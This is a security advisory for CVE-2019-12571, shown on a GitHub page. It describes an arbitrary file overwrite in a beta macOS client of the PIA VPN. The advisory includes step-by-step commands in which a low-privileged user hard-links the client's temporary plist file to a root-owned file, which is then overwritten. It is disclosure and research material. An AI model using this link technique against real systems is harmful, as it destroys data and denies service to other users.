Permalink
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
security-research/vulnerabilities/PIA/CVE-2019-12571.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
111 lines (73 sloc)
3.44 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Title: PIA Beta macOS Arbitrary File Overwrite | |
| Author: Rich Mirch | |
| CVE: CVE-2019-12571 | |
| Vendor Advisory: N/A | |
| Description | |
| A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client | |
| v0.9.8 beta (build 02099) for macOS could allow an authenticated, local attacker to | |
| overwrite arbitrary files. | |
| When the client initiates a connection, the XML /tmp/pia-watcher.plist file is created. | |
| If the file exists, it will be truncated and the contents completely overwritten. | |
| This file is removed on disconnect. An unprivileged user can create a hard or soft | |
| link to arbitrary files owned by any user on the system, including root. This creates | |
| a denial of service condition and possible data loss if leveraged by a malicious local user. | |
| CVSS | |
| Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H/E:H/RL:U/RC:C | |
| Base: 7.1 | |
| Temporal: 7.1 | |
| Test Environment | |
| OS: macOS Mojave 10.14.1 | |
| Kernel: Darwin Kernel Version 18.2.0 | |
| PIA Version: v0.9.8 beta (build 02099) | |
| Steps to reproduce | |
| All steps are executed as a low privileged user. | |
| macbook:~ test2$ id | |
| uid=508(test2) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),704(com.apple.sharepoint.group.4),100(_lpoperator),701(com.apple.sharepoint.group.1),333(piavpn),703(com.apple.sharepoint.group.3),702(com.apple.sharepoint.group.2) | |
| Step 1 - Create a root owned test file with permissions 600. | |
| bash-3.2# echo "this is a test" > /etc/test.file | |
| bash-3.2# chmod 600 /etc/test.file | |
| bash-3.2# ls -ld /etc/test.file | |
| -rw------- 1 root wheel 15 Dec 27 10:14 /etc/test.file | |
| Step 2 - Show that test2 does not have permission to write to /etc/test.file. | |
| macbook:~ test2$ echo test > /etc/test.file | |
| -bash: /etc/test.file: Permission denied | |
| Step 3 - Create a hard or soft link to a root owned file. | |
| macbook:~ test2$ ln /etc/test.file /tmp/pia-watcher.plist | |
| macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist | |
| 12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /etc/test.file | |
| 12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /tmp/pia-watcher.plist | |
| Step 4 - Open the PIA client and connect. The file will be overwritten with the XML plist. | |
| macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist | |
| ls: /tmp/pia-watcher.plist: No such file or directory | |
| 12888119231 -rw------- 1 root wheel 801 Dec 27 10:17 /etc/test.file | |
| Step 5 - As root display the contents of /etc/secret.file | |
| bash-3.2# cat /etc/test.file | |
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | |
| <plist version="1.0"> | |
| <dict> | |
| <key>Label</key> | |
| <string>com.privateinternetaccess.vpn.watcher</string> | |
| <key>ProgramArguments</key> | |
| <array> | |
| <string>/Applications/Private Internet Access.app/Contents/MacOS/pia-openvpn-helper</string> | |
| </array> | |
| <key>EnvironmentVariables</key> | |
| <dict> | |
| <key>script_type</key> | |
| <string>watch-notify</string> | |
| </dict> | |
| <key>StandardErrorPath</key> | |
| <string>/Library/Application Support/com.privateinternetaccess.vpn/watcher.log</string> | |
| <key>WatchPaths</key> | |
| <array> | |
| <string>/Library/Preferences/SystemConfiguration</string> | |
| </array> | |
| </dict> | |
| </plist> | |
| Timeline: | |
| 2018-12-27: Reported to vendor | |
| 2018-12-27: Vendor acknowledged receipt of report | |
| 2019-01-18: Vendor states fix will be available in v83 however this version was never released. | |
| The desktop client was re-written. Upgrade to v1.2.1+ of the new client. | |
| 2019-06-10: Public disclosure |